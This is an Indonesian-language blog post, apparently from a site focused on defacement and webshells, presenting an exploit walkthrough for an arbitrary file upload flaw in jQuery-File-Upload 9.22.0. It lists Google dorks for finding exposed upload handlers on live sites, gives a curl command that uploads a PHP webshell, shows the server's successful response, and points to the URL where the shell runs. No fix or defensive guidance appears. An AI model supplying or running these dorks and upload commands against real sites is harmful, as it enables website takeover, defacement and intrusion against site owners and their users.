Home Deface Exploit Terminal Terminal Emulator Termux Webshell Proof of Concept: jQuery File Upload - Arbitrary File Upload Vulnerability

Proof of Concept: jQuery File Upload - Arbitrary File Upload Vulnerability


Pada kesempatan kali ini, aku ingin membahas tentang vulnerabilty pada jQuery-File-Upload versi 9.22.0.

Celah di UploadHandler.php tidak memerlukan validasi apa pun untuk mengunggah file ke server. Selain itu, tidak ada pengecualian untuk jenis file yang dapat diunggah. Hal ini memungkinkan attacker untuk mengunggah file backdoor ke server tanpa hambatan.

Eksploitasi jQuery File

Dork
inurl:/jquery-file-upload/server/php/
inurl:/assets/global/plugins/jquery-file-upload/
inurl:/assets/plugins/jquery-file-upload/
Exploit
http://localhost.com/[path/jQuery-File-Upload/server/php/

Lokasi Plugins mungkin saja berbeda kalian cukup menyesuaikan saja. 

Jika muncul pesan seperti itu kemungkinan vuln dan kita bisa lanjut ke tahap berikutnya. 

curl -F "files=@msvfm.php" http://localhost.com/jQuery-File-Upload/server/php/ -v

 

curl -F "files=@msvfm.php" http://localhost:8080/jQuery-File-Upload/server/php/ -v
* Host localhost:8080 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
*   Trying [::1]:8080...
* connect to ::1 port 8080 from ::1 port 52922 failed: Connection refused
*   Trying 127.0.0.1:8080...
* Connected to localhost (127.0.0.1) port 8080
> POST /jQuery-File-Upload/server/php/ HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/8.6.0
> Accept: */*
> Content-Length: 15538
> Content-Type: multipart/form-data; boundary=------------------------yQskUl32nhudBKqhsoAMZE
>
* We are completely uploaded and fine
< HTTP/1.1 200 OK
< Host: localhost:8080
< Date: Thu, 21 Mar 2024 08:01:51 GMT
< Connection: close
< X-Powered-By: PHP/8.2.8
< Content-type: text/html; charset=UTF-8
<
* Closing connection
{"files":[{"name":"msvfm.php","size":15324,"type":"application\/octet-stream","url":"http:\/\/localhost:8080\/jQuery-File-Upload\/server\/php\/files\/msvfm.php","deleteUrl":"http:\/\/localhost:8080\/jQuery-File-Upload\/server\/php\/?file=msvfm.php","deleteType":"DELETE"}]}

 

Untuk akses shell bisa di:

http://localhost.com/[path]/jQuery-File-Upload/server/php/files/msvfm.php

 

Sekian tutorial kalian ini. 

Get updates in your Inbox
Subscribe